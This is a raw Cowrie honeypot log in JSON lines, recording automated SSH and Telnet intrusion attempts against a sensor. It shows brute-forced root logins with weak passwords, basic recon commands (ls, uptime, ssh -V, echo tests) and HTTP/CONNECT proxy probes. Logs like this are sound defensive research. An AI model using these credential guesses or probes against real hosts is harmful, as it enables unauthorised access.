{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:21:38.296744Z","src_ip":"212.227.125.160","session":"0fba50994c19"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:21:45.057369Z","src_ip":"212.227.125.160","session":"0fba50994c19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:21:47.967200Z","src_ip":"212.227.125.160","session":"0fba50994c19"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T22:21:47.968117Z","src_ip":"212.227.125.160","session":"0fba50994c19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:21:49.344460Z","src_ip":"212.227.125.160","session":"0fba50994c19"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:21:49.345692Z","src_ip":"212.227.125.160","session":"0fba50994c19"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35172,"dst_ip":"1.2.3.4","dst_port":22,"session":"c86483f183f8","protocol":"ssh","message":"New connection: 201.148.180.50:35172 (1.2.3.4:22) [session: c86483f183f8]","sensor":"my-vps","timestamp":"2025-08-28T22:21:55.711445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:21:57.407371Z","src_ip":"201.148.180.50","session":"c86483f183f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:21:57.408834Z","src_ip":"201.148.180.50","session":"c86483f183f8"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:22:07.925966Z","src_ip":"201.148.180.50","session":"c86483f183f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:22:11.273950Z","src_ip":"201.148.180.50","session":"c86483f183f8"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-28T22:22:11.274682Z","src_ip":"201.148.180.50","session":"c86483f183f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:22:12.742251Z","src_ip":"201.148.180.50","session":"c86483f183f8"}
{"eventid":"cowrie.session.closed","duration":"17.0","message":"Connection lost after 17.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:22:12.743778Z","src_ip":"201.148.180.50","session":"c86483f183f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57172,"dst_ip":"1.2.3.4","dst_port":22,"session":"1faaf615343b","protocol":"ssh","message":"New connection: 212.227.125.160:57172 (1.2.3.4:22) [session: 1faaf615343b]","sensor":"my-vps","timestamp":"2025-08-28T22:22:28.594573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:22:28.595536Z","src_ip":"212.227.125.160","session":"1faaf615343b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T22:22:28.810924Z","src_ip":"212.227.125.160","session":"1faaf615343b"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:22:29.458873Z","src_ip":"212.227.125.160","session":"1faaf615343b"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:22:29.675020Z","src_ip":"212.227.125.160","session":"1faaf615343b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35629,"dst_ip":"1.2.3.4","dst_port":23,"session":"eeaa3609acd3","protocol":"telnet","message":"New connection: 212.227.125.160:35629 (1.2.3.4:23) [session: eeaa3609acd3]","sensor":"my-vps","timestamp":"2025-08-28T22:22:34.490511Z"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":6323,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e2c49ff97b2","protocol":"ssh","message":"New connection: 186.225.142.90:6323 (1.2.3.4:22) [session: 2e2c49ff97b2]","sensor":"my-vps","timestamp":"2025-08-28T22:22:44.147116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:22:44.150912Z","src_ip":"186.225.142.90","session":"2e2c49ff97b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:22:44.338592Z","src_ip":"186.225.142.90","session":"2e2c49ff97b2"}
{"eventid":"cowrie.login.success","username":"root","password":"11021986v","message":"login attempt [root/11021986v] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:22:45.109373Z","src_ip":"186.225.142.90","session":"2e2c49ff97b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:22:45.509538Z","src_ip":"186.225.142.90","session":"2e2c49ff97b2"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T22:22:45.510293Z","src_ip":"186.225.142.90","session":"2e2c49ff97b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:22:45.703765Z","src_ip":"186.225.142.90","session":"2e2c49ff97b2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:22:45.704983Z","src_ip":"186.225.142.90","session":"2e2c49ff97b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53296,"dst_ip":"1.2.3.4","dst_port":22,"session":"f85568fdbfac","protocol":"ssh","message":"New connection: 212.227.235.229:53296 (1.2.3.4:22) [session: f85568fdbfac]","sensor":"my-vps","timestamp":"2025-08-28T22:22:51.342940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:22:51.343760Z","src_ip":"212.227.235.229","session":"f85568fdbfac"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T22:22:51.599689Z","src_ip":"212.227.235.229","session":"f85568fdbfac"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:22:52.627407Z","src_ip":"212.227.235.229","session":"f85568fdbfac"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:22:52.884534Z","src_ip":"212.227.235.229","session":"f85568fdbfac"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65094,"dst_ip":"1.2.3.4","dst_port":22,"session":"875515632eb2","protocol":"ssh","message":"New connection: 217.72.205.35:65094 (1.2.3.4:22) [session: 875515632eb2]","sensor":"my-vps","timestamp":"2025-08-28T22:22:58.495202Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:22:58.496354Z","src_ip":"217.72.205.35","session":"875515632eb2"}
{"eventid":"cowrie.session.closed","duration":30.522163152694702,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:23:05.012585Z","src_ip":"212.227.125.160","session":"eeaa3609acd3"}
{"eventid":"cowrie.session.connect","src_ip":"220.80.99.240","src_port":50936,"dst_ip":"1.2.3.4","dst_port":23,"session":"b660748c3474","protocol":"telnet","message":"New connection: 220.80.99.240:50936 (1.2.3.4:23) [session: b660748c3474]","sensor":"my-vps","timestamp":"2025-08-28T22:23:49.717361Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.235","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"814905f7fdef","protocol":"ssh","message":"New connection: 185.156.73.235:64001 (1.2.3.4:22) [session: 814905f7fdef]","sensor":"my-vps","timestamp":"2025-08-28T22:23:54.852642Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:23:54.872884Z","src_ip":"185.156.73.235","session":"814905f7fdef"}
{"eventid":"cowrie.session.closed","duration":13.429561376571655,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:24:03.146828Z","src_ip":"220.80.99.240","session":"b660748c3474"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52974,"dst_ip":"1.2.3.4","dst_port":23,"session":"db049364468d","protocol":"telnet","message":"New connection: 212.227.235.229:52974 (1.2.3.4:23) [session: db049364468d]","sensor":"my-vps","timestamp":"2025-08-28T22:24:58.581647Z"}
{"eventid":"cowrie.login.failed","username":"austinpowers","password":"dr3vil1999","message":"login attempt [austinpowers/dr3vil1999] failed","sensor":"my-vps","timestamp":"2025-08-28T22:24:59.823783Z","src_ip":"212.227.235.229","session":"db049364468d"}
{"eventid":"cowrie.session.closed","duration":1.8623685836791992,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:25:00.443946Z","src_ip":"212.227.235.229","session":"db049364468d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52984,"dst_ip":"1.2.3.4","dst_port":23,"session":"a46a51d872b3","protocol":"telnet","message":"New connection: 212.227.235.229:52984 (1.2.3.4:23) [session: a46a51d872b3]","sensor":"my-vps","timestamp":"2025-08-28T22:25:00.567697Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:25:01.813833Z","src_ip":"212.227.235.229","session":"a46a51d872b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:25:01.841156Z","src_ip":"212.227.235.229","session":"a46a51d872b3"}
{"eventid":"cowrie.command.input","input":"echo ECHO_TEST_1756419902401900034","message":"CMD: echo ECHO_TEST_1756419902401900034","sensor":"my-vps","timestamp":"2025-08-28T22:25:02.466139Z","src_ip":"212.227.235.229","session":"a46a51d872b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4afea43681326d6337e5cc101ed6f427983896f79cf5e00f823762e481ceb916","size":526,"shasum":"4afea43681326d6337e5cc101ed6f427983896f79cf5e00f823762e481ceb916","duplicate":false,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/4afea43681326d6337e5cc101ed6f427983896f79cf5e00f823762e481ceb916 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:25:03.423389Z","src_ip":"212.227.235.229","session":"a46a51d872b3"}
{"eventid":"cowrie.session.closed","duration":2.8588669300079346,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:25:03.426476Z","src_ip":"212.227.235.229","session":"a46a51d872b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44194,"dst_ip":"1.2.3.4","dst_port":22,"session":"0683c211cd5a","protocol":"ssh","message":"New connection: 212.227.235.229:44194 (1.2.3.4:22) [session: 0683c211cd5a]","sensor":"my-vps","timestamp":"2025-08-28T22:25:42.680903Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-28T22:25:42.681845Z","src_ip":"212.227.235.229","session":"0683c211cd5a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:25:42.682520Z","src_ip":"212.227.235.229","session":"0683c211cd5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44214,"dst_ip":"1.2.3.4","dst_port":22,"session":"319e6422cf01","protocol":"ssh","message":"New connection: 212.227.235.229:44214 (1.2.3.4:22) [session: 319e6422cf01]","sensor":"my-vps","timestamp":"2025-08-28T22:25:44.093109Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T22:25:44.243196Z","src_ip":"212.227.235.229","session":"319e6422cf01"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:25:44.244478Z","src_ip":"212.227.235.229","session":"319e6422cf01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44220,"dst_ip":"1.2.3.4","dst_port":22,"session":"505319f21561","protocol":"ssh","message":"New connection: 212.227.235.229:44220 (1.2.3.4:22) [session: 505319f21561]","sensor":"my-vps","timestamp":"2025-08-28T22:25:44.655338Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T22:25:44.723280Z","src_ip":"212.227.235.229","session":"505319f21561"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:25:44.724411Z","src_ip":"212.227.235.229","session":"505319f21561"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58362,"dst_ip":"1.2.3.4","dst_port":23,"session":"65661dcda690","protocol":"telnet","message":"New connection: 212.227.125.160:58362 (1.2.3.4:23) [session: 65661dcda690]","sensor":"my-vps","timestamp":"2025-08-28T22:27:12.148834Z"}
{"eventid":"cowrie.session.closed","duration":9.886627912521362,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:22.035395Z","src_ip":"212.227.125.160","session":"65661dcda690"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29820,"dst_ip":"1.2.3.4","dst_port":22,"session":"6de9e1e1d8a5","protocol":"ssh","message":"New connection: 212.227.125.160:29820 (1.2.3.4:22) [session: 6de9e1e1d8a5]","sensor":"my-vps","timestamp":"2025-08-28T22:27:39.435415Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:39.654653Z","src_ip":"212.227.125.160","session":"6de9e1e1d8a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29826,"dst_ip":"1.2.3.4","dst_port":22,"session":"98554cb343af","protocol":"ssh","message":"New connection: 212.227.125.160:29826 (1.2.3.4:22) [session: 98554cb343af]","sensor":"my-vps","timestamp":"2025-08-28T22:27:39.813924Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:40.056602Z","src_ip":"212.227.125.160","session":"98554cb343af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29828,"dst_ip":"1.2.3.4","dst_port":22,"session":"830b2c4f6da5","protocol":"ssh","message":"New connection: 212.227.125.160:29828 (1.2.3.4:22) [session: 830b2c4f6da5]","sensor":"my-vps","timestamp":"2025-08-28T22:27:40.628200Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:40.850507Z","src_ip":"212.227.125.160","session":"830b2c4f6da5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29856,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b5f87723603","protocol":"ssh","message":"New connection: 212.227.125.160:29856 (1.2.3.4:22) [session: 8b5f87723603]","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.334462Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25305,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e3bdb828657","protocol":"ssh","message":"New connection: 212.227.125.160:25305 (1.2.3.4:22) [session: 6e3bdb828657]","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.366647Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.367671Z","src_ip":"212.227.125.160","session":"6e3bdb828657"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.465897Z","src_ip":"212.227.125.160","session":"8b5f87723603"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.467126Z","src_ip":"212.227.125.160","session":"8b5f87723603"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25569,"dst_ip":"1.2.3.4","dst_port":22,"session":"46c1662b32a2","protocol":"ssh","message":"New connection: 212.227.125.160:25569 (1.2.3.4:22) [session: 46c1662b32a2]","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.478115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.478939Z","src_ip":"212.227.125.160","session":"46c1662b32a2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T22:27:41.592240Z","src_ip":"212.227.125.160","session":"46c1662b32a2"}
